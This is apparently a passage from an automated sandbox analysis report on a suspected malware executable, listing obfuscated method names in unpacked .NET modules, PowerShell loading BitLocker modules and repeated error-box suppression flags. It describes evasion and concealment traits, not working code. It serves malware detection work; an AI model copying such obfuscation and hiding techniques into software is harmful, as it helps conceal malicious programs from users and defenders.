Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, KRE4ukpr4IOJexM5nd.cs	High entropy of concatenated method names: 'HMknCH6H10', 'o8Kn59akTF', 'yIDn2ynUmf', 'hCwnvxooQE', 'jN2nca1gDm', 'peJnMqm47X', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, mqTtGf4PeYYgt8c8Vm.cs	High entropy of concatenated method names: 'C7HZr50uVbdv1ZtRGPs', 'h9df8Z0CiPIuvjFpEef', 'AjARFR0KmmyHVQlXVIb', 'BPBin3buhO', 'nZpiX8D3ci', 'p5uilCnSwF', 's3TQoN0UyCm4C4cZJvy', 'sYH56L0jEoIHXT0wLes'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, EsUJZerg4qXAwNRNmF.cs	High entropy of concatenated method names: 'Wl5QalXDpT', 'YP2QsvXZDk', 'vjwQctCjKH', 'hTnQZHC3YW', 'UylQ5xVkYs', 'RcqQ2A0RNV', 'PTgQv1ehlZ', 'r4mQMTAKHv', 'NuKQEEMEuN', 'yy2Q0se4Qp'
Source: 0.2.A4mmSHCUi2.exe.45882f0.2.raw.unpack, F7TS0xzrcEpWUDn8mx.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dgUXyBVHau', 'RE9XQX5KVq', 'MxAXPJbvDc', 'UEVXKdbPJZ', 'KOFXnpGDvQ', 'gQnXXTy0UB', 'NT1XlwmsNK'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, vWcwPHRad2Roxs8yNJV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MZSlc68IIm', 'XEflZW4lA3', 'Wm0lLN0Xvd', 'RsBlNoeE2F', 'A8flxaI0EO', 'Kq3lW8Qc36', 'CwJlpAEI72'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, oSwEsso09Mkcg65DAT.cs	High entropy of concatenated method names: 'vnvKrhxCZy', 'LHnKBtCQB7', 'ToString', 'XWTKeTkNFO', 'kI0K4bABow', 'mnLKYt9r4O', 'aToKTG5m9I', 'FEiKixhDJX', 'DDFK3Pd9im', 'VeLK1P4VeD'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, uq3WgDqhO9XZMXWfuk.cs	High entropy of concatenated method names: 'WSvXbmSxEP', 'qhtXO6YMl7', 'HQ1XJ7ZSxE', 'dq2XeF8wCB', 'FU5X4lW5lR', 'YPqXTVTc5D', 'sn1XihwAeY', 'nQmnpRqEkj', 'wv9nU5sXMP', 'XBungMc005'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, NLhbhxF9xrwG1riJEW.cs	High entropy of concatenated method names: 'Sgs8APCH5', 'pQsRu5B6s', 'KEI9JxtyU', 'MhYkbeyAr', 'YHZDMgLAL', 'rMxuhQSZV', 'Xww4TclmrhWVMjSR2i', 'cdyBKeSORAs2LWbwX2', 'b0bnS2oGp', 'WvOlFN9sv'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, fI4KCYYaE0KstsmM8Z.cs	High entropy of concatenated method names: 'HXS4cvnpYs', 'rYd4ZKadx8', 'W3K4Lyp7YM', 'ugG4NfUf2A', 'g2A4xZ3BUB', 'sW84WhcPgx', 'k9v4pZNTp2', 'VQr4UYj9ri', 'MS94g73UOK', 'P8J4qShfdO'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, IwmQcWygeY281oMpMf.cs	High entropy of concatenated method names: 'lKtTtI56cf', 'dduTkD2P10', 'nxBY27UmLv', 'LcOYvNO7p2', 'sKjYM1ljec', 'lILYEOcUNJ', 'YdOY0hbsKB', 'QljYoliTXp', 'GjqYjKrKVL', 'AuIYakfAgm'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, BNQlZFkw6popO7KXBi.cs	High entropy of concatenated method names: 'pMKnedkerY', 'N42n40bprS', 'Qm5nYYTHYT', 'tn0nTr9lD3', 'VAUniteYUB', 'T2sn3tGbwi', 'H0Un1PVnS8', 'PvHnd3vDWO', 'p02nr7DddV', 'HS0nB1qNVC'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, btCCW57r3XgeNcUUr6.cs	High entropy of concatenated method names: 'th63eXjMh9', 'R593YvgVYJ', 'xjD3i6HLWY', 'w1RiqABSJV', 'I4qizuRsU3', 'aZr36t5ua1', 'zVn3bwqCUT', 'zhN3mqNlqK', 'MyP3Onc535', 'b9D3JjB9Ts'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, vshqB1GWuAvYC4MRcm.cs	High entropy of concatenated method names: 'YQmy7gt7Os', 'R56yD44xC8', 'C4RyChnLYR', 'oxRy5OrTFA', 'OZJyvSj9XS', 'lN3yMuVy8S', 'Q8gy0KV3PK', 'CJDyoMvtr7', 'exjyauQPuK', 'P9vyGWM8kN'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, iILhRxLFrUQAgKWxI5.cs	High entropy of concatenated method names: 'xQ3KU1ER8S', 'fRVKqtAUdc', 'Rjon6lMemS', 'NtnnbQwQpk', 'VbKKGa7thi', 'WqMKst76vb', 'OXaKFNuIFl', 'qOHKcovTtd', 'oHvKZaSlTc', 'sdoKLZbFT2'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, U8xH9ldD4CjKQuEwfo.cs	High entropy of concatenated method names: 'EuPOHmxN0f', 'kUtOeb0Zn7', 'PbkO4e4jin', 'wR5OYqbXcI', 'lo4OTVYygh', 'hlFOiVrnqh', 't8tO3k169b', 'h6KO1keODA', 'RdZOdfJ79g', 'iuIOry3Exx'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, yktdnGO5UfkLa4JLIX.cs	High entropy of concatenated method names: 'LhE3I6JWjy', 'TYu3wVW6Jw', 'UmV38tSYFq', 'Hgg3RaS3cL', 'lsH3t1YoXe', 'JWT39JIdGw', 'PnD3kJoQIb', 'wkN37nECAb', 'v4J3DwQBkM', 'Vsi3urjcLK'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, syVEwOKhXLXNiFylnc.cs	High entropy of concatenated method names: 'U6DiSpWYqh', 'dubiIaOG8t', 'v8Ni8g4cw3', 'FJQiREc65M', 'NSLi927G1a', 'K17ik7KL4S', 'VaTiDZTNPP', 'k3qiuqqiug', 'P6W9iv0AD8cWHnrj21d', 'mlwjW70bX5GOqQxCXdx'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, T6edl0iKcvg5atoN1X.cs	High entropy of concatenated method names: 'JquiHKkZJl', 'UVmi4WOJqM', 'oeGiTmgCk9', 'DJii3F6ZDd', 'sPqi1hAi1v', 'N3NTxkVEUJ', 'Tf6TW5e6RZ', 'ou2Tpu1I6I', 'nA2TUpQMJ8', 'hFaTgD6GUg'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, nCrxaeTTomdUZHeaOp.cs	High entropy of concatenated method names: 'Dispose', 'NCKbgbXZnk', 'qv7m5DwaUf', 'XtuAA9JrMS', 'X5ybqJGqsr', 'lh0bz3OrJ8', 'ProcessDialogKey', 'PV3m6F7lsL', 'Od4mbwCiAF', 'aVsmmHJRw8'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, sw82b7RU8NVLIVEc3Ly.cs	High entropy of concatenated method names: 'N6rXINJ0Ah', 'tF0XwMQkGP', 'HCLX8c1uGH', 'sywXRlYitF', 'UiaXtW51nP', 'iCqX9E1Vcq', 'BRcXkd3Q5u', 'hQ3X77iaeh', 'BrcXDvj7VL', 'AbGXuv5LXm'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, JnwIHAxNPMc7kALJ30.cs	High entropy of concatenated method names: 'VwAb3be7V7', 'mGJb1aTE7b', 'GmUbrWSLa7', 'k9PbB1Pq7P', 'jmubQI5o4D', 'EXcbPnOuYc', 'JRw949wsBsbLAEVpmV', 'nbk1GhfHFmnhTZu2sC', 'm7dbbjGTUs', 'T9ybOU0eGt'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, tuVOPcsfv635U8RtuQ.cs	High entropy of concatenated method names: 'FeDYR8emxi', 'D8QY9gitMr', 'NPSY7r0HSG', 'hhmYDsj9dE', 'QLtYQKAPMW', 'Mv1YP6TWuS', 'sd3YK1ZgoD', 'QuZYnuBKkA', 'X26YXxGXpS', 'FljYlKlpYM'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, KRE4ukpr4IOJexM5nd.cs	High entropy of concatenated method names: 'HMknCH6H10', 'o8Kn59akTF', 'yIDn2ynUmf', 'hCwnvxooQE', 'jN2nca1gDm', 'peJnMqm47X', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, mqTtGf4PeYYgt8c8Vm.cs	High entropy of concatenated method names: 'C7HZr50uVbdv1ZtRGPs', 'h9df8Z0CiPIuvjFpEef', 'AjARFR0KmmyHVQlXVIb', 'BPBin3buhO', 'nZpiX8D3ci', 'p5uilCnSwF', 's3TQoN0UyCm4C4cZJvy', 'sYH56L0jEoIHXT0wLes'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, EsUJZerg4qXAwNRNmF.cs	High entropy of concatenated method names: 'Wl5QalXDpT', 'YP2QsvXZDk', 'vjwQctCjKH', 'hTnQZHC3YW', 'UylQ5xVkYs', 'RcqQ2A0RNV', 'PTgQv1ehlZ', 'r4mQMTAKHv', 'NuKQEEMEuN', 'yy2Q0se4Qp'
Source: 0.2.A4mmSHCUi2.exe.45006d0.1.raw.unpack, F7TS0xzrcEpWUDn8mx.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dgUXyBVHau', 'RE9XQX5KVq', 'MxAXPJbvDc', 'UEVXKdbPJZ', 'KOFXnpGDvQ', 'gQnXXTy0UB', 'NT1XlwmsNK'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, vWcwPHRad2Roxs8yNJV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MZSlc68IIm', 'XEflZW4lA3', 'Wm0lLN0Xvd', 'RsBlNoeE2F', 'A8flxaI0EO', 'Kq3lW8Qc36', 'CwJlpAEI72'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, oSwEsso09Mkcg65DAT.cs	High entropy of concatenated method names: 'vnvKrhxCZy', 'LHnKBtCQB7', 'ToString', 'XWTKeTkNFO', 'kI0K4bABow', 'mnLKYt9r4O', 'aToKTG5m9I', 'FEiKixhDJX', 'DDFK3Pd9im', 'VeLK1P4VeD'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, uq3WgDqhO9XZMXWfuk.cs	High entropy of concatenated method names: 'WSvXbmSxEP', 'qhtXO6YMl7', 'HQ1XJ7ZSxE', 'dq2XeF8wCB', 'FU5X4lW5lR', 'YPqXTVTc5D', 'sn1XihwAeY', 'nQmnpRqEkj', 'wv9nU5sXMP', 'XBungMc005'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, NLhbhxF9xrwG1riJEW.cs	High entropy of concatenated method names: 'Sgs8APCH5', 'pQsRu5B6s', 'KEI9JxtyU', 'MhYkbeyAr', 'YHZDMgLAL', 'rMxuhQSZV', 'Xww4TclmrhWVMjSR2i', 'cdyBKeSORAs2LWbwX2', 'b0bnS2oGp', 'WvOlFN9sv'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, fI4KCYYaE0KstsmM8Z.cs	High entropy of concatenated method names: 'HXS4cvnpYs', 'rYd4ZKadx8', 'W3K4Lyp7YM', 'ugG4NfUf2A', 'g2A4xZ3BUB', 'sW84WhcPgx', 'k9v4pZNTp2', 'VQr4UYj9ri', 'MS94g73UOK', 'P8J4qShfdO'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, IwmQcWygeY281oMpMf.cs	High entropy of concatenated method names: 'lKtTtI56cf', 'dduTkD2P10', 'nxBY27UmLv', 'LcOYvNO7p2', 'sKjYM1ljec', 'lILYEOcUNJ', 'YdOY0hbsKB', 'QljYoliTXp', 'GjqYjKrKVL', 'AuIYakfAgm'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, BNQlZFkw6popO7KXBi.cs	High entropy of concatenated method names: 'pMKnedkerY', 'N42n40bprS', 'Qm5nYYTHYT', 'tn0nTr9lD3', 'VAUniteYUB', 'T2sn3tGbwi', 'H0Un1PVnS8', 'PvHnd3vDWO', 'p02nr7DddV', 'HS0nB1qNVC'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, btCCW57r3XgeNcUUr6.cs	High entropy of concatenated method names: 'th63eXjMh9', 'R593YvgVYJ', 'xjD3i6HLWY', 'w1RiqABSJV', 'I4qizuRsU3', 'aZr36t5ua1', 'zVn3bwqCUT', 'zhN3mqNlqK', 'MyP3Onc535', 'b9D3JjB9Ts'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, vshqB1GWuAvYC4MRcm.cs	High entropy of concatenated method names: 'YQmy7gt7Os', 'R56yD44xC8', 'C4RyChnLYR', 'oxRy5OrTFA', 'OZJyvSj9XS', 'lN3yMuVy8S', 'Q8gy0KV3PK', 'CJDyoMvtr7', 'exjyauQPuK', 'P9vyGWM8kN'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, iILhRxLFrUQAgKWxI5.cs	High entropy of concatenated method names: 'xQ3KU1ER8S', 'fRVKqtAUdc', 'Rjon6lMemS', 'NtnnbQwQpk', 'VbKKGa7thi', 'WqMKst76vb', 'OXaKFNuIFl', 'qOHKcovTtd', 'oHvKZaSlTc', 'sdoKLZbFT2'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, U8xH9ldD4CjKQuEwfo.cs	High entropy of concatenated method names: 'EuPOHmxN0f', 'kUtOeb0Zn7', 'PbkO4e4jin', 'wR5OYqbXcI', 'lo4OTVYygh', 'hlFOiVrnqh', 't8tO3k169b', 'h6KO1keODA', 'RdZOdfJ79g', 'iuIOry3Exx'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, yktdnGO5UfkLa4JLIX.cs	High entropy of concatenated method names: 'LhE3I6JWjy', 'TYu3wVW6Jw', 'UmV38tSYFq', 'Hgg3RaS3cL', 'lsH3t1YoXe', 'JWT39JIdGw', 'PnD3kJoQIb', 'wkN37nECAb', 'v4J3DwQBkM', 'Vsi3urjcLK'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, syVEwOKhXLXNiFylnc.cs	High entropy of concatenated method names: 'U6DiSpWYqh', 'dubiIaOG8t', 'v8Ni8g4cw3', 'FJQiREc65M', 'NSLi927G1a', 'K17ik7KL4S', 'VaTiDZTNPP', 'k3qiuqqiug', 'P6W9iv0AD8cWHnrj21d', 'mlwjW70bX5GOqQxCXdx'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, T6edl0iKcvg5atoN1X.cs	High entropy of concatenated method names: 'JquiHKkZJl', 'UVmi4WOJqM', 'oeGiTmgCk9', 'DJii3F6ZDd', 'sPqi1hAi1v', 'N3NTxkVEUJ', 'Tf6TW5e6RZ', 'ou2Tpu1I6I', 'nA2TUpQMJ8', 'hFaTgD6GUg'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, nCrxaeTTomdUZHeaOp.cs	High entropy of concatenated method names: 'Dispose', 'NCKbgbXZnk', 'qv7m5DwaUf', 'XtuAA9JrMS', 'X5ybqJGqsr', 'lh0bz3OrJ8', 'ProcessDialogKey', 'PV3m6F7lsL', 'Od4mbwCiAF', 'aVsmmHJRw8'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, sw82b7RU8NVLIVEc3Ly.cs	High entropy of concatenated method names: 'N6rXINJ0Ah', 'tF0XwMQkGP', 'HCLX8c1uGH', 'sywXRlYitF', 'UiaXtW51nP', 'iCqX9E1Vcq', 'BRcXkd3Q5u', 'hQ3X77iaeh', 'BrcXDvj7VL', 'AbGXuv5LXm'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, JnwIHAxNPMc7kALJ30.cs	High entropy of concatenated method names: 'VwAb3be7V7', 'mGJb1aTE7b', 'GmUbrWSLa7', 'k9PbB1Pq7P', 'jmubQI5o4D', 'EXcbPnOuYc', 'JRw949wsBsbLAEVpmV', 'nbk1GhfHFmnhTZu2sC', 'm7dbbjGTUs', 'T9ybOU0eGt'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, tuVOPcsfv635U8RtuQ.cs	High entropy of concatenated method names: 'FeDYR8emxi', 'D8QY9gitMr', 'NPSY7r0HSG', 'hhmYDsj9dE', 'QLtYQKAPMW', 'Mv1YP6TWuS', 'sd3YK1ZgoD', 'QuZYnuBKkA', 'X26YXxGXpS', 'FljYlKlpYM'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, KRE4ukpr4IOJexM5nd.cs	High entropy of concatenated method names: 'HMknCH6H10', 'o8Kn59akTF', 'yIDn2ynUmf', 'hCwnvxooQE', 'jN2nca1gDm', 'peJnMqm47X', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, mqTtGf4PeYYgt8c8Vm.cs	High entropy of concatenated method names: 'C7HZr50uVbdv1ZtRGPs', 'h9df8Z0CiPIuvjFpEef', 'AjARFR0KmmyHVQlXVIb', 'BPBin3buhO', 'nZpiX8D3ci', 'p5uilCnSwF', 's3TQoN0UyCm4C4cZJvy', 'sYH56L0jEoIHXT0wLes'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, EsUJZerg4qXAwNRNmF.cs	High entropy of concatenated method names: 'Wl5QalXDpT', 'YP2QsvXZDk', 'vjwQctCjKH', 'hTnQZHC3YW', 'UylQ5xVkYs', 'RcqQ2A0RNV', 'PTgQv1ehlZ', 'r4mQMTAKHv', 'NuKQEEMEuN', 'yy2Q0se4Qp'
Source: 0.2.A4mmSHCUi2.exe.79f0000.3.raw.unpack, F7TS0xzrcEpWUDn8mx.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dgUXyBVHau', 'RE9XQX5KVq', 'MxAXPJbvDc', 'UEVXKdbPJZ', 'KOFXnpGDvQ', 'gQnXXTy0UB', 'NT1XlwmsNK'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
